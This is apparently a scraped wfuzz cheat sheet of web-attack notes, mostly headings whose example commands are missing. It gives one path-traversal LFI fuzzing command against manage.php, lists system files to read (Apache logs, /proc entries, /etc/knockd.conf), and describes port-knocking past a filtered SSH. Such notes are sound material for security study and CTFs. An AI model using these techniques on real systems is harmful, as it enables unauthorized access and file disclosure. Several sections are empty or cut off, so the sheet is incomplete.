wfuzz
CheetSheet
Login Form bruteforce
POST, Single list, filter string (hide)
POST, 2 lists, filder code (show)
GET, 2 lists, filter string (show), proxy, cookies
Bruteforce Dicrectory/RESTful bruteforce
Path Parameters BF
Header Authentication
Basic, 2 lists, filter string (show), proxy
NTLM, 2 lists, filter string (show), proxy
Cookie/Header bruteforce (vhost brute)
Cookie, filter code (show), proxy
User-Agent, filter code (hide), proxy
Host
HTTP Verbs (methods) bruteforce
Using file
Using inline list
Directory & Files Bruteforce
Tool to bypass Webs
LFI brute force
This should look for LFI vuln.
Filtering such as word count with --hw or --hc (status code) may be needed
setting a session cookie may also be needed with -b "PHPSESID=something"
files to look.
/var/log/apache2/access.log
cd /proc has wonderful info (about what process exists )
try
/proc/self/cmdline
wfuzz -z range,0-100 -u http://IP/manage.php?file=../../../../../../proc/self/fd/FUZZ
-b "SESSIONCOOKIE" may be needed
If ssh is filtered, you may try this!
/proc/sched_debug is useful sometimes.
if "knockd" exists, it's a port knocking service --> which means some ports may have filters.
/etc/knockd.conf
it may look like this.
In this case, to access SSH, we need to access 7569, 8475,9842 in the correct order.
access these ports with nc and then try to ssh.
Last updated